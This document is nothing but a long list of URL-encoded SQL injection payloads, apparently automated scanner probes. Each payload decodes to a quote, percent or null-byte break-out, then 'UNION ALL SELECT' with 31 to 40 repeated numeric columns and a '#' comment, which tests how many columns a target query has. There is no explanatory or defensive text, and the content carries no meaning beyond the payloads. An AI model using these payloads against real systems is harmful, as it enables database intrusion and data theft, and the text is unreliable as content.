-4481%22%29%29%20UNION%20ALL%20SELECT%202476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%23 -5002%22%29%29%20UNION%20ALL%20SELECT%201198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%23 -8789%22%29%29%29%20UNION%20ALL%20SELECT%206826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%23 -4027%22%29%29%29%20UNION%20ALL%20SELECT%205402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%23 -9345%22%29%29%29%20UNION%20ALL%20SELECT%203329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%23 -6566%22%29%29%29%20UNION%20ALL%20SELECT%201295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%2C1295%23 -2854%22%29%29%29%20UNION%20ALL%20SELECT%209807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%2C9807%23 -1620%22%29%29%29%20UNION%20ALL%20SELECT%208086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%2C8086%23 -9037%22%29%29%29%20UNION%20ALL%20SELECT%201206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%23 -3101%22%29%29%29%20UNION%20ALL%20SELECT%208802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%2C8802%23 -3701%22%29%29%29%20UNION%20ALL%20SELECT%208641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%23 -1752%22%29%29%29%20UNION%20ALL%20SELECT%203243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%2C3243%23 -5736%22%20UNION%20ALL%20SELECT%207558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%2C7558%23 -7949%22%20UNION%20ALL%20SELECT%205599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%2C5599%23 -9403%22%20UNION%20ALL%20SELECT%209523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%23 -6334%22%20UNION%20ALL%20SELECT%204712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%23 -1391%22%20UNION%20ALL%20SELECT%202849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%23 -1894%22%20UNION%20ALL%20SELECT%204496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%2C4496%23 -9508%22%20UNION%20ALL%20SELECT%209909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%23 -8863%22%20UNION%20ALL%20SELECT%209820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%2C9820%23 -6173%22%20UNION%20ALL%20SELECT%206522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%2C6522%23 -4141%22%20UNION%20ALL%20SELECT%208087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%2C8087%23 -7721%25%27%29%20UNION%20ALL%20SELECT%204728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%2C4728%23 -2701%25%27%29%20UNION%20ALL%20SELECT%201950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%23 -3075%25%27%29%20UNION%20ALL%20SELECT%209471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%2C9471%23 -5344%25%27%29%20UNION%20ALL%20SELECT%201800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%2C1800%23 -1901%25%27%29%20UNION%20ALL%20SELECT%202466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%2C2466%23 -2865%25%27%29%20UNION%20ALL%20SELECT%205205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%2C5205%23 -6044%25%27%29%20UNION%20ALL%20SELECT%209831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%23 -2868%25%27%29%20UNION%20ALL%20SELECT%207543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%23 -1248%25%27%29%20UNION%20ALL%20SELECT%202869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%2C2869%23 -8155%25%27%29%20UNION%20ALL%20SELECT%203125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%23 -6114%25%27%29%29%20UNION%20ALL%20SELECT%204123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%23 -1512%25%27%29%29%20UNION%20ALL%20SELECT%208672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%23 -4577%25%27%29%29%20UNION%20ALL%20SELECT%202233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%23 -3623%25%27%29%29%20UNION%20ALL%20SELECT%202386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%2C2386%23 -4680%25%27%29%29%20UNION%20ALL%20SELECT%207240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%23 -6406%25%27%29%29%20UNION%20ALL%20SELECT%201307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%23 -8962%25%27%29%29%20UNION%20ALL%20SELECT%204708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%23 -8259%25%27%29%29%20UNION%20ALL%20SELECT%205758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%2C5758%23 -1276%25%27%29%29%20UNION%20ALL%20SELECT%205683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%23 -7227%25%27%29%29%20UNION%20ALL%20SELECT%207527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%2C7527%23 -4233%25%27%29%29%29%20UNION%20ALL%20SELECT%208203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%23 -1216%25%27%29%29%29%20UNION%20ALL%20SELECT%208826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%23 -3236%25%27%29%29%29%20UNION%20ALL%20SELECT%201232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%23 -3868%25%27%29%29%29%20UNION%20ALL%20SELECT%209326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%2C9326%23 -3170%25%27%29%29%29%20UNION%20ALL%20SELECT%207980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%2C7980%23 -7820%25%27%29%29%29%20UNION%20ALL%20SELECT%207813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%2C7813%23 -2086%25%27%29%29%29%20UNION%20ALL%20SELECT%206255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%2C6255%23 -6058%25%27%29%29%29%20UNION%20ALL%20SELECT%204727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%23 -3497%25%27%29%29%29%20UNION%20ALL%20SELECT%205224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%2C5224%23 -6935%25%27%29%29%29%20UNION%20ALL%20SELECT%201623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%23 -9663%25%27%20UNION%20ALL%20SELECT%204901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%2C4901%23 -9759%25%27%20UNION%20ALL%20SELECT%201987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%23 -9279%25%27%20UNION%20ALL%20SELECT%204157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%2C4157%23 -8116%25%27%20UNION%20ALL%20SELECT%203019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%23 -7260%25%27%20UNION%20ALL%20SELECT%208149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%23 -6684%25%27%20UNION%20ALL%20SELECT%202284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%23 -7978%25%27%20UNION%20ALL%20SELECT%205834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%23 -3516%25%27%20UNION%20ALL%20SELECT%209339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%2C9339%23 -9877%25%27%20UNION%20ALL%20SELECT%208093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%23 -9266%25%27%20UNION%20ALL%20SELECT%204698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%2C4698%23 -4108%00%27%29%20UNION%20ALL%20SELECT%206991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%23 -3586%00%27%29%20UNION%20ALL%20SELECT%202670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%2C2670%23 -9229%00%27%29%20UNION%20ALL%20SELECT%203809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%23 -3219%00%27%29%20UNION%20ALL%20SELECT%205160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%23 -9538%00%27%29%20UNION%20ALL%20SELECT%208841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%2C8841%23 -3748%00%27%29%20UNION%20ALL%20SELECT%204505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%2C4505%23 -8885%00%27%29%20UNION%20ALL%20SELECT%202668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%23 -6928%00%27%29%20UNION%20ALL%20SELECT%205356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%23 -7387%00%27%29%20UNION%20ALL%20SELECT%209081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%23 -6958%00%27%29%20UNION%20ALL%20SELECT%202413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%23 -2617%00%27%20UNION%20ALL%20SELECT%208697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%2C8697%23 